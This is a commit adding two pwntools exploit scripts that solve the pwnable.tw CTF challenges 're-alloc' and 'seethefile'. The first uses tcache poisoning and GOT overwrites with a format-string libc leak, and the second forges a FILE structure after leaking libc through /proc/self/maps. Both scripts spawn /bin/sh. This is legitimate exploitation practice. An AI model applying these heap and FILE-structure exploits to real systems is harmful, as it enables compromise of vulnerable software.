some more writueps

Author: joshdabosh

pwnabletw/re-alloc/solve.py

@@ -0,0 +1,132 @@
+from pwn import *
+
+e = ELF("./re-alloc")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.29.so")
+
+context.binary = e
+context.terminal = ["konsole", "-e"]
+
+
+
+
+def alloc(idx, size, data):
+    p.sendlineafter(":", "1")
+    p.sendlineafter(":", str(idx))
+    p.sendlineafter(":", str(size))
+    p.sendafter(":", data)
+    
+
+
+def realloc1(idx, size):
+    p.sendlineafter(":", "2")
+    p.sendlineafter(":", str(idx))
+    p.sendlineafter(":", str(size))
+
+
+
+
+def realloc2(idx, size, data):
+    p.sendlineafter(":", "2")
+    p.sendlineafter(":", str(idx))
+    p.sendlineafter(":", str(size))
+    p.sendafter(":", data)
+    
+    
+
+def free(idx):
+    p.sendlineafter(":", "3")
+    p.sendlineafter(":", str(idx))
+    
+
+#p = process([ld.path, e.path], env={"LD_PRELOAD": libc.path})
+p = remote("chall.pwnable.tw", 10106)
+
+context.log_level="debug"
+gdb.attach(p, """c""")
+
+
+
+
+# tcache poison 0x20
+alloc(1, 0x10, "BBBB")
+
+realloc1(1, 0)
+
+realloc2(1, 0x10, p64(e.got["atoll"]))
+
+alloc(0, 0x10, "AAAA")
+
+
+realloc2(1, 0x60, "CCCC")
+
+
+free(1)
+
+
+realloc2(0, 0x70, p64(e.got["atoll"]))
+
+free(0)
+
+
+# tcache poison 0x30
+alloc(0, 0x20, "BBBB")
+
+realloc1(0, 0)
+
+realloc2(0, 0x20, p64(e.got["atoll"]))
+
+alloc(1, 0x20, "AAAA")
+
+
+realloc2(0, 0x60, "CCCC")
+
+
+free(0)
+
+
+realloc2(1, 0x70, p64(e.got["atoll"]))
+
+free(1)
+
+
+
+# leak libc
+print("binary atoll", hex(e.got["atoll"]))
+print("binary arr at", hex(0x004040b0))
+
+alloc(0, 0x20, p64(e.plt["printf"]))
+
+
+p.sendlineafter(":", "1")
+p.sendafter(":", "%p %p |%p|")
+
+
+
+
+# write system
+p.recvuntil("|")
+dat = p.recvuntil("|")[:-1]
+libc.address = eval(dat) - 0x12e009
+
+
+p.sendlineafter("choice:", "1")
+p.sendafter(":", "A")
+p.sendlineafter(":", "A"*15)
+
+print("libc system", hex(libc.sym["system"]))
+p.sendafter(":", p64(libc.sym["system"]))
+
+
+p.sendlineafter(":", "1")
+p.sendafter(":", "/bin/sh\x00")
+
+p.interactive()
+
+
+
+
+
+
+
+

pwnabletw/seethefile/solve.py

@@ -0,0 +1,143 @@
+from pwn import *
+
+e = ELF("./seethefile")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.23.so")
+
+context.binary = e
+context.terminal = ["konsole", "-e"]
+
+p = process([e.path])
+p = remote("chall.pwnable.tw", 10200)
+
+context.log_level="debug"
+gdb.attach(p, """break * main+216""")
+
+
+def open_file(n):
+    p.sendlineafter(":", "1")
+    p.sendlineafter(":", n)
+
+
+def read_file():
+    p.sendlineafter(":", "2")
+    
+
+def write_file():
+    p.sendlineafter(":", "3")
+    
+
+def close_file():
+    p.sendlineafter(":", "4")
+    
+
+def exit_out(n):
+    p.sendlineafter(":", "5")
+    p.sendlineafter(":", n)
+
+
+open_file("/proc/self/maps")
+
+read_file()
+
+write_file()
+
+read_file()
+
+write_file()
+
+
+
+p.recvuntil("libc")
+p.recvuntil("f7")
+libc.address = int("f7"+p.recv(6).strip(), 16) - 0x1ad000
+
+
+print("libc base", hex(libc.address))
+
+
+
+close_file()
+
+
+
+
+
+
+name_addr = 0x0804b260
+
+
+
+
+#generated_vtable = ''.join(p64(i) for i in vtable)
+
+name_filler = "\x00"*16 + p32(libc.sym["system"])
+
+name_filler = name_filler.ljust(32, "\x00")
+
+
+f_obj = "\x01\x01;/bin/sh"
+
+f_obj += p8(0)*2
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+
+f_obj += p32(0)
+
+f_obj += p32(0)
+f_obj += p32(0)
+
+f_obj += p32(0x0804bf01)
+
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+
+f_obj += p32(0)
+
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+f_obj += p32(0)
+
+f_obj += p32(name_addr+48+len(f_obj)+8)
+
+
+
+
+print("exit@libc", hex(libc.sym["exit"]))
+print("system@libc", hex(libc.sym["system"]))
+print("fclose@libc", hex(libc.sym["fclose"]))
+
+
+
+
+
+exit_out(name_filler + p64(name_addr+48) + p64(0x4141414141414141) + f_obj + p32(0) + "A"*28 + p32(name_addr+16-8))
+
+
+
+
+
+
+
+
+p.interactive()
+
+
+
+
+
+